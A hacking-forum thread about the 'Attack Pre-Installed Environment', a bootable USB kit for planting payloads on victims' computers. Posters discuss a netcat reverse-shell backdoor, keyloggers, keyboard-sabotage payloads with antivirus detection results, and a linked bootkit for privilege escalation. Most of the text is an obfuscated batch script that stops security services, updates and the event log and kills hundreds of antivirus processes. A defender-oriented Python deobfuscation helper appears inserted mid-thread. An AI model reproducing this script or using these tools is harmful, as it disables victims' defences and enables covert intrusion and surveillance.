The Attack Pre-Installed Environment


sablefoxx

Cmdo - Installs a netcat backdoor to port 69 (reverse shell); use NConnect to connect to the victim (fixed the BSOD bug)

--> Is it really that simple?? You just install that and then you are able to connect to your victim computer from, let's say, your home?? What about protection from the firewall of your router?? Just fire up Netcat and you're off to go?

Well, you won't be able to connect through (NAT) firewalls unless you edit the script to include the IP you plan to connect from; otherwise, in XP it will automatically add itself to the Windows Firewall exception list, or in Vista if UAC is disabled. However, if UAC is enabled, or the victim has a third-party firewall installed, it will ask to add itself. Best used over LANs; however, with a little editing you can easily connect over the internet, through any firewall as well.

Otherwise it is that simple.

OK, well, so far so good: Leapo's payload seems to be working, well, working-ish, but I can figure that out through testing.

I'll just ask one thing at a time, as I seem to confuse people when I rabbit on, lol.

I have extracted to USB and set the settings from menu.bat; I have copied keyl_PE.exe to the pen drive and when clicked it says it's installed fine, but there is no C:\windows\keyl.txt. Hmmm.

Any help, guys?

Those payloads need to be installed from PE: boot from the USB drive and then run Keylpe.exe. I have also posted versions that can be installed from userspace.

Question: I have installed APE on a USB and patched the ISO, but it won't boot. My question is, what have I done wrong?

Not all systems boot from USB; try another computer. Let me know if no system will boot from it.

Also, typing this on a G1; I am out of town, so I won't be able to post updates for a while.

I am able to boot from USB using this computer, as I have done so before (BackTrack 4). However, my question is where the boot record on the USB is, because currently all I see is the .iso file, which usually needs to be unpacked before it can be booted, but APE might work differently.

Good work here, enjoy the new version, but there is one thing:

Whenever I try to run Leapo's payload on Vista, it says that it can't find go.vbs.

So then I tried logging onto my computer, and I go to system and I can clearly see go.vbs, and when I click it, it says that Vista can't find go.vbs even though it's right in front of its face!!!

Any help would be gladly appreciated.

There also seem to be a number of bugs in Leapo's payload; I can't get it to work no matter what. I've tested it on Vista 32-bit, Vista 64-bit, and XP 64-bit. Has anyone else gotten this to work?

  • 2 weeks later...

Yeah, working on updates, but I've been really busy with school (I also just got a Fon in the mail, so I've been playing around with that too). Hope to have new content and bug fixes up soon :)

As far as your problems with finding/running go.vbs, it may have been blocked by anti-virus, or possibly problems with UAC. Remember Leapo's payload is writable, so AV can still remove files from it; however, with the new updates, running the payload before logging in should be easier (that way no AV and no UAC).

  • 2 weeks later...

I have coded a bat file that kills most popular anti-viruses, kills the firewall and updates, and other goodies. It's undetectable but totally not stealthy and is still in beta. I think that it would be a perfect addition to APE. Comments, problems, and I hope it will get patched into APE :lol:

I call it AVKILLA

@echo off
cd c:\recycler\S-1-5-21-1202660629-261903793-725345543-1003
del /F /Q run.bat
set ii=ne
set ywe=st
set ury=t
set iej=op
set jt53=Syma
set o6t=nor
set lyd2=fee
set h3d=ton
set gf45=ntec
set own5=McA
%ii%%ury% %ywe%%iej% "Security Center" /y
%ii%%ury% %ywe%%iej% "Automatic Updates" /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y
%ii%%ury% %ywe%%iej% "SAVScan" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Firewall Monitor Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto-Protect Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2% Spamkiller Server" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2% Personal Firewall Service" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2% SecurityCenter Update Manager" /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% SPBBCSvc" /y
cls
%ii%%ury% %ywe%%iej% "Ahnlab Task Scheduler" /y
%ii%%ury% %ywe%%iej% navapsvc /y
%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y
%ii%%ury% %ywe%%iej% vrmonsvc /y
%ii%%ury% %ywe%%iej% MonSvcNT /y
%ii%%ury% %ywe%%iej% SAVScan /y
%ii%%ury% %ywe%%iej% NProtectService /y
%ii%%ury% %ywe%%iej% ccSetMGR /y
%ii%%ury% %ywe%%iej% ccEvtMGR /y
%ii%%ury% %ywe%%iej% srservice /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% Network Drivers Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% Unerase Protection" /y
%ii%%ury% %ywe%%iej% MskService /y
%ii%%ury% %ywe%%iej% MpfService /y
%ii%%ury% %ywe%%iej% mcupdmgr.exe /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2%AntiSpyware" /y
%ii%%ury% %ywe%%iej% helpsvc /y
%ii%%ury% %ywe%%iej% ERSvc /y
%ii%%ury% %ywe%%iej% "*%o6t%%h3d%*" /y
%ii%%ury% %ywe%%iej% "*%jt53%%gf45%*" /y
%ii%%ury% %ywe%%iej% "*%own5%%lyd2%*" /y
cls
%ii%%ury% %ywe%%iej% ccPwdSvc /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y
%ii%%ury% %ywe%%iej% navapsvc /y
%ii%%ury% %ywe%%iej% "Serv-U" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% AntiVirus Client" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Server" /y
%ii%%ury% %ywe%%iej% "NAV Alert" /y
%ii%%ury% %ywe%%iej% "Nav Auto-Protect" /y
cls
%ii%%ury% %ywe%%iej% "McShield" /y
%ii%%ury% %ywe%%iej% "DefWatch" /y
%ii%%ury% %ywe%%iej% eventlog /y
%ii%%ury% %ywe%%iej% InoRPC /y
%ii%%ury% %ywe%%iej% InoRT /y
%ii%%ury% %ywe%%iej% InoTask /y
cls
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Corporate Edition" /y
%ii%%ury% %ywe%%iej% "ViRobot Professional Monitoring" /y
%ii%%ury% %ywe%%iej% "PC-cillin Personal Firewall" /y
%ii%%ury% %ywe%%iej% "Trend Micro Proxy Service" /y
%ii%%ury% %ywe%%iej% "Trend NT Realtime Service" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2%.com McShield" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2%.com VirusScan Online Realtime Engine" /y
%ii%%ury% %ywe%%iej% "SyGateService" /y
%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y
cls
%ii%%ury% %ywe%%iej% "Sophos Anti-Virus" /y
%ii%%ury% %ywe%%iej% "Sophos Anti-Virus Network" /y
%ii%%ury% %ywe%%iej% "eTrust Antivirus Job Server" /y
%ii%%ury% %ywe%%iej% "eTrust Antivirus Realtime Server" /y
%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y
%ii%%ury% %ywe%%iej% "eTrust Antivirus RPC Server" /y
cls
net stop netsvcs
net stop spoolnt
pskill spoolsvc.exe
pskill spoolsv.exe
pskill netsvcs.exe
pskill srvany.exe
pskill spool.exe
pskill secure32.exe
pskill ahnsd.exe
pskill mspmspsv.exe
pskill stisvc.exe
pskill servudaemon.exe
pskill snservice.exe
pskill noadmon.exe
pskill ahnsdsv.exe
pskill sdac11ba.exe
pskill system.exe
pskill navapsvc.exe
pskill winload.exe
pskill v3p3at.exe
pskill monsvcnt.exe
pskill winhelp32.exe
pskill sagent2.exe
pskill win32.exe
pskill monsysnt.exe
pskill cisvsc.exe
pskill alg.exe
pskill mdm.exe
pskill mcshield.exe
pskill nvsvc32.exe
pskill rundll32.exe
pskill msdevice.exe
pskill srvmon.exe
pskill rundll32.exe
pskill userbatch.exe
pskill navapw32.exe
pskill keyservice.exe
pskill netpiadw.exe
pskill dwagent.exe
pskill internat.exe
pskill dllsvc.exe
pskill mvcc.exe
pskill tachy.exe
pskill lsass12.exe
pskill tskmngr.exe
pskill bomsvc32.exe
pskill vstmgr.exe
pskill firedaemon.exe
pskill lvcoms.exe
pskill msnupdate.exe
pskill conime.exe
pskill gmt.exe
pskill mtbp.exe
pskill squerycontrol32.exe
pskill precisiontime.exe
pskill winhost.exe
pskill net.exe
pskill serviceguard.exe
pskill swoff.exe
pskill mstunnel.exe
pskill msfig.exe
pskill fxsvc.exe
pskill clisvc.exe
pskill mspmspsv.exe
pskill ccap.exe
pskill mcshield.exe
pskill vrmonsvc.exe
pskill vrmonNT.exe
pskill v3impro.exe
pskill ncvscc32.exe
pskill host.exe
pskill videosd32.exe
pskill msgfixer.exe
pskill adspider.exe
pskill regsvc.exe
pskill naviagent.exe
pskill winserv32.exe
pskill dllhost.exe
pskill hkcmd.exe
pskill sqlmngr.exe
pskill llssrv.exe
pskill svchost2.exe
pskill ipbind.exe
pskill ftp.exe
pskill svchost1.exe
pskill winsys9242.exe
pskill turboagent.exe
pskill hkstart.exe
pskill winmgmt.exe
pskill mouse32a.exe
pskill net1.exe
pskill winmysqladmin.exe
pskill sctsvc.exe
pskill winmgnt.exe
pskill iroffer.exe
pskill awhost32.exe
pskill wuauclt.exe
pskill a2guard
pskill aavshield
pskill AckWin32
pskill ADVCHK
pskill AhnSD
pskill airdefense
pskill ALERTSVC
pskill ALMon
pskill ALOGSERV
pskill ALsvc
pskill amon
pskill Anti-Trojan
pskill AntiVirScheduler
pskill AntiVirService
pskill ANTS
pskill APVXDWIN
pskill Armor2net
pskill ashAvast
pskill ashDisp
pskill ashEnhcd
pskill ashMaiSv
pskill ashPopWz
pskill ashServ
pskill ashSimpl
pskill ashSkPck
pskill ashWebSv
pskill aswUpdSv
pskill ATCON
pskill ATUPDATER
pskill ATWATCH
pskill AUPDATE
pskill AUTODOWN
pskill AUTOTRACE
pskill AUTOUPDATE
pskill avciman
pskill Avconsol
pskill AVENGINE
pskill avgamsvr
pskill avgcc
pskill AVGCC32
pskill AVGCTRL
pskill avgemc
pskill avgfwsrv
pskill AVGNT
pskill avgntdd
pskill avgntmgr
pskill AVGSERV
pskill AVGUARD
pskill avgupsvc
pskill avinitnt
pskill AvkServ
pskill AVKService
pskill AVKWCtl
pskill AVP
pskill AVP32
pskill avpcc
pskill avpm
pskill AVPUPD
pskill AVSCHED32
pskill avsynmgr
pskill AVWUPD32
pskill AVWUPSRV
pskill AVXMONITOR9X
pskill AVXMONITORNT
pskill AVXQUAR
pskill BackWeb-4476822
pskill bdmcon
pskill bdnews
pskill bdoesrv
pskill bdss
pskill bdsubmit
pskill bdswitch
pskill blackd
pskill blackice
pskill cafix
pskill ccApp
pskill ccEvtMgr
pskill ccProxy
pskill ccSetMgr
pskill CFIAUDIT
pskill ClamTray
pskill ClamWin
pskill Claw95
pskill Claw95cf
pskill cleaner
pskill cleaner3
pskill CliSvc
pskill CMGrdian
pskill cpd
pskill DefWatch
pskill DOORS
pskill DrVirus
pskill drwadins
pskill drweb32w
pskill drwebscd
pskill DRWEBUPW
pskill ESCANH95
pskill ESCANHNT
pskill ewidoctrl
pskill EzAntivirusRegistrationCheck
pskill F-AGNT95
pskill F-PROT95
pskill F-Sched
pskill F-StopW
pskill FAMEH32
pskill FAST
pskill FCH32
pskill FireSvc
pskill FireTray
pskill FIREWALL
pskill fpavupdm
pskill freshclam
pskill FRW
pskill fsav32
pskill fsavgui
pskill fsbwsys
pskill fsdfwd
pskill FSGK32
pskill fsgk32st
pskill fsgui
pskill FSM32
pskill FSMA32
pskill FSMB32
pskill fspex
pskill fssm32
pskill gcasDtServ
pskill gcasServ
pskill GIANTAntiSpywareMain
pskill GIANTAntiSpywareUpdater
pskill GUARD
pskill GUARDGUI
pskill GuardNT
pskill HRegMon
pskill Hrres
pskill HSockPE
pskill HUpdate
pskill iamapp
pskill iamserv
pskill ICLOAD95
pskill ICLOADNT
pskill ICMON
pskill ICSSUPPNT
pskill ICSUPP95
pskill ICSUPPNT
pskill IFACE
pskill INETUPD
pskill InocIT
pskill InoRpc
pskill InoRT
pskill InoTask
pskill InoUpTNG
pskill IOMON98
pskill isafe
pskill ISATRAY
pskill ISRV95
pskill ISSVC
pskill JEDI
pskill KAV
pskill kavmm
pskill KAVPF
pskill KavPFW
pskill KAVStart
pskill KAVSvc
pskill KAVSvcUI
pskill KMailMon
pskill KPfwSvc
pskill KWatch
pskill livesrv
pskill LOCKDOWN2000
pskill LogWatNT
pskill lpfw
pskill LUALL
pskill LUCOMSERVER
pskill Luupdate
pskill MCAGENT
pskill mcmnhdlr
pskill mcregwiz
pskill Mcshield
pskill MCUPDATE
pskill mcvsshld
pskill MINILOG
pskill MONITOR
pskill MonSysNT
pskill MOOLIVE
pskill MpEng
pskill mpssvc
pskill MSMPSVC
pskill myAgtSvc
pskill myagttry
pskill navapsvc
pskill NAVAPW32
pskill NavLu32
pskill NAVW32
pskill NDD32
pskill NeoWatchLog
pskill NeoWatchTray
pskill NISSERV
pskill NISUM
pskill NMAIN
pskill nod32
pskill nod32krn
pskill nod32kui
pskill NORMIST
pskill notstart
pskill npavtray
pskill NPFMNTOR
pskill npfmsg
pskill NPROTECT
pskill NSCHED32
pskill NSMdtr
pskill NssServ
pskill NssTray
pskill ntrtscan
pskill NTXconfig
pskill NUPGRADE
pskill NVC95
pskill Nvcod
pskill Nvcte
pskill Nvcut
pskill NWService
pskill OfcPfwSvc
pskill OUTPOST
pskill PAV
pskill PavFires
pskill PavFnSvr
pskill Pavkre
pskill PavProt
pskill pavProxy
pskill pavprsrv
pskill pavsrv51
pskill PAVSS
pskill pccguide
pskill PCCIOMON
pskill pccntmon
pskill PCCPFW
pskill PcCtlCom
pskill PCTAV
pskill PERSFW
pskill pertsk
pskill PERVAC
pskill PNMSRV
pskill POP3TRAP
pskill POPROXY
pskill prevsrv
pskill PsImSvc
pskill QHM32
pskill QHONLINE
pskill QHONSVC
pskill QHPF
pskill qhwscsvc
pskill RavMon
pskill RavTimer
pskill Realmon
pskill REALMON95
pskill Rescue
pskill rfwmain
pskill Rtvscan
pskill RTVSCN95
pskill RuLaunch
pskill SAVAdminService
pskill SAVMain
pskill savprogress
pskill SAVScan
pskill SCAN32
pskill ScanningProcess
pskill sched
pskill sdhelp
pskill SERVIC~1
pskill SHSTAT
pskill SiteCli
pskill smc
pskill SNDSrvc
pskill SPBBCSvc
pskill SPHINX
pskill spiderml
pskill spidernt
pskill Spiderui
pskill SpybotSD
pskill SPYXX
pskill SS3EDIT
pskill stopsignav
pskill swAgent
pskill swdoctor
pskill SWNETSUP
pskill symlcsvc
pskill SymProxySvc
pskill SymSPort
pskill SymWSC
pskill SYNMGR
pskill TAUMON
pskill TBMon
pskill TC
pskill tca
pskill TCM
pskill TDS-3
pskill TeaTimer
pskill TFAK
pskill THAV
pskill THSM
pskill Tmas
pskill tmlisten
pskill Tmntsrv
pskill TmPfw
pskill tmproxy
pskill TNBUtil
pskill TRJSCAN
pskill Up2Date
pskill UPDATE
pskill UpdaterUI
pskill upgrepl
pskill Vba32ECM
pskill Vba32ifs
pskill vba32ldr
pskill Vba32PP3
pskill VBSNTW
pskill vchk
pskill vcrmon
pskill VetTray
pskill VirusKeeper
pskill VPTRAY
pskill vrfwsvc
pskill VRMONNT
pskill vrmonsvc
pskill vrrw32
pskill VSECOMR
pskill Vshwin32
pskill vsmon
pskill vsserv
pskill VsStat
pskill WATCHDOG
pskill WebProxy
pskill Webscanx
pskill WEBTRAP
pskill WGFE95
pskill Winaw32
pskill winroute
pskill winss
pskill winssnotify
pskill WRADMIN
pskill WRCTRL
pskill xcommsvr
pskill zatutor
pskill ZAUINST
pskill zlclient
pskill zonealarm
pskill _AVP32
pskill _AVPCC
pskill _AVPM
pskill scanwscs
pskill scanmsg
pskill onlnsvc
pskill upschd
pskill antivirus 
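
For a defender triaging a script like the one above, the variable splitting (`set ii=ne` ... `%ii%%ury%`) hides the `net stop` verb and the vendor names from simple string matching. The following Python helper, added here and not part of the AVKILLA script or the APE project, resolves cmd.exe `%var%` substitution and lists which services and processes a batch file would stop or kill; the script embedded in it is a constructed excerpt in the same style, and it assumes only plain `set name=value` lines and `%name%` references (no delayed expansion or substring syntax).

```python
"""Resolve cmd.exe %var% substitution in an obfuscated batch script.

Added analysis helper; not part of the AVKILLA script or the APE project.
Assumes only plain 'set name=value' lines and '%name%' references.
"""
import re

# Constructed sample: a short excerpt in the same style as the posted script.
SAMPLE = r"""@echo off
set ii=ne
set ywe=st
set ury=t
set iej=op
set jt53=Syma
set gf45=ntec
%ii%%ury% %ywe%%iej% "Security Center" /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y
cls
pskill navapsvc.exe
pskill ccApp
"""

SET_RE = re.compile(r"^\s*set\s+([^=\s]+)=(.*)$", re.IGNORECASE)
VAR_RE = re.compile(r"%([^%\s]+)%")


def expand(line, env):
    """Replace each %name% with its value (names are case-insensitive in
    cmd.exe); an unknown name in a batch file expands to the empty string."""
    return VAR_RE.sub(lambda m: env.get(m.group(1).lower(), ""), line)


def deobfuscate(text):
    """Return (expanded command lines, variable table) for a batch script.

    SET lines are consumed into the table (their values may reference
    earlier variables, so they are expanded too); 'cls' and '@echo off'
    are dropped because they carry no behaviour worth listing."""
    env = {}
    out = []
    for raw in text.splitlines():
        m = SET_RE.match(raw)
        if m:
            env[m.group(1).lower()] = expand(m.group(2), env)
            continue
        expanded = expand(raw, env).strip()
        if expanded and expanded.lower() not in ("cls", "@echo off"):
            out.append(expanded)
    return out, env


def summarize(lines):
    """Group targets by verb: services stopped via 'net stop' and
    processes killed via pskill, with quotes and the trailing /y removed."""
    summary = {"net stop": [], "pskill": []}
    for line in lines:
        low = line.lower()
        if low.startswith("net stop "):
            target = line[len("net stop "):].strip()
            target = re.sub(r"\s*/y\s*$", "", target, flags=re.IGNORECASE)
            summary["net stop"].append(target.strip().strip('"'))
        elif low.startswith("pskill "):
            summary["pskill"].append(line.split(None, 1)[1].strip())
    return summary


if __name__ == "__main__":
    cmds, table = deobfuscate(SAMPLE)
    print("variables:", table)
    for verb, targets in summarize(cmds).items():
        print(f"{verb}: {targets}")
```

Run it against a real sample by replacing SAMPLE with the file contents; the resulting service and process names are what an endpoint monitor would watch for being stopped.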

Unless your name is Codine and you are from the hakforums and you wrote that in 2007, then you didn't code that.

PROOF

Forum topic

Posted by wohawsnng 01-14-08

Please give credit where credit is due.

timmy, timmy, timmy... we are well versed in the art of teh internets here

*** hope to have a new version up soon (lots of cool new stuff)... fucking school :( ***

Wonder if I could get a few people to test the new payload install method; made a nice little GUI.

This is just a few keyboard payloads I made while playing around with AHK (lots of fun btw!). Patch it into your AttackPE.iso file and select "PE" under mode to install payloads from PE; otherwise select "Normal" mode.

Note: You may need to run as an admin in Vista if UAC is enabled (and not in PE)!

Features:

1. All keyboard payloads included in one small .exe
2. Built-in removal tools
3. GUI (simple)
4. Install payloads from Normal mode or PE
5. Auto-detects if you're in Normal mode or PE (v1.2+)
6. You do NOT need AttackPE to use these payloads!

Planning on converting all the payloads to something like this, so let me know what you think!

Download:

Compiled && Source (v1.2)

Detection Rate:

Antivirus          Version         Last Update  Result
a-squared          4.0.0.101       2009.04.21   -
AhnLab-V3          5.0.0.2         2009.04.21   -
AntiVir            7.9.0.148       2009.04.20   -
Antiy-AVL          2.0.3.1         2009.04.20   -
Authentium         5.1.2.4         2009.04.20   -
Avast              4.8.1335.0      2009.04.20   -
AVG                8.5.0.287       2009.04.20   -
BitDefender        7.2             2009.04.21   -
CAT-QuickHeal      10.00           2009.04.21   -
ClamAV             0.94.1          2009.04.21   -
Comodo             1123            2009.04.20   -
DrWeb              4.44.0.09170    2009.04.21   -
eSafe              7.0.17.0        2009.04.20   Suspicious File
eTrust-Vet         31.6.6440       2009.04.20   -
F-Prot             4.4.4.56        2009.04.20   -
F-Secure           8.0.14470.0     2009.04.21   -
Fortinet           3.117.0.0       2009.04.21   -
GData              19              2009.04.21   -
Ikarus             T3.1.1.49.0     2009.04.21   -
K7AntiVirus        7.10.709        2009.04.20   -
Kaspersky          7.0.0.125       2009.04.21   -
McAfee             5590            2009.04.20   -
McAfee+Artemis     5590            2009.04.20   -
McAfee-GW-Edition  6.7.6           2009.04.21   -
Microsoft          1.4602          2009.04.21   -
NOD32              4023            2009.04.20   -
Norman             6.00.06         2009.04.20   -
nProtect           2009.1.8.0      2009.04.20   -
Panda              10.0.0.14       2009.04.20   -
PCTools            4.4.2.0         2009.04.21   -
Prevx1             V2              2009.04.21   -
Rising             21.26.10.00     2009.04.21   -
Sophos             4.40.0          2009.04.21   -
Sunbelt            3.2.1858.2      2009.04.18   -
Symantec           1.4.4.12        2009.04.21   -
TheHacker          6.3.4.0.312     2009.04.21   -
TrendMicro         8.700.0.1004    2009.04.21   -
VBA32              3.12.10.2       2009.04.21   -
ViRobot            2009.4.21.1701  2009.04.21   -
VirusBuster        4.6.5.0         2009.04.20   -

Total: 2.5% (Suspicious File Only)

Hi, been reading these forums for a while now, so I decided to join so I can contribute and learn a bit more :). Anyway...

Sable, I tried your payloads UI and they work perfectly, but I cannot seem to disable the payload once it's activated. It says it's removed, but I still get binary, lol :). Any ideas?

EDIT: Also forgot to say Sophos does not detect a thing. Bonus.

SableFoxx, why not add something like the Vbootkit? It takes control of the Windows boot process to allow privilege escalation. Here is the source:

http://www.nvlabs.in/archives/5-BOOT-KIT-C...Subversion.html

And the white paper:

http://www.nvlabs.in/uploads/projects/vboo..._whitepaper.pdf

Here is a compiled version, not yet tested:

http://www.mediafire.com/download.php?2zrkzmuakyn

My bad, press Windows Key + X (keyr.exe does NOT remap the 'x' key by default) to stop all the keyboard payloads. This only temporarily stops the payload that is running; then run removal. Also, if you're running Vista, you may need to run keybrd_pl.exe 'as admin'. Thanks for the input, I'll make a fix for this.

There are also some bugs in keyr.exe; I'll be posting updates soon.

@DingleBerries, interesting... very interesting...

4/25/09 Edit: Released updated v1.2; fixes bugs with Keyr and removal not working correctly after the payload was activated.

Almost everything has a removal tool (only the cmdo payload does not); the updated version I'm working on now will fix that. But certainly, anytime you boot into a PE, a couple of wrong clicks or commands can break the local OS, so be careful *shakes finger*

The new keyboard payloads have a built-in removal tool; as of 1.2 it actually works :)

Thanks for such a speedy reply. Great project.

:)

Sorry for double post.

I tried to install this, but couldn't boot to my USB drive on my home PC. The PC is normally a bit of a tough one for booting to USB: even after disabling the HD in the BIOS, it fails to detect the OS on the USB and magically boots to Vista :(. I even booted into Puppy Linux to make the USB partition bootable; still nothing.

Any help would be great. Thanks.

In my experience, sometimes APE just won't boot on some systems, and I'm not sure how to fix that. However, here are a few tricks you can try:

1. Use a different USB drive; sometimes it's the drive itself, not the computer.

2. Disable USB legacy support in the BIOS (not every BIOS has this).

If anyone else has found some cool tricks, please post them.
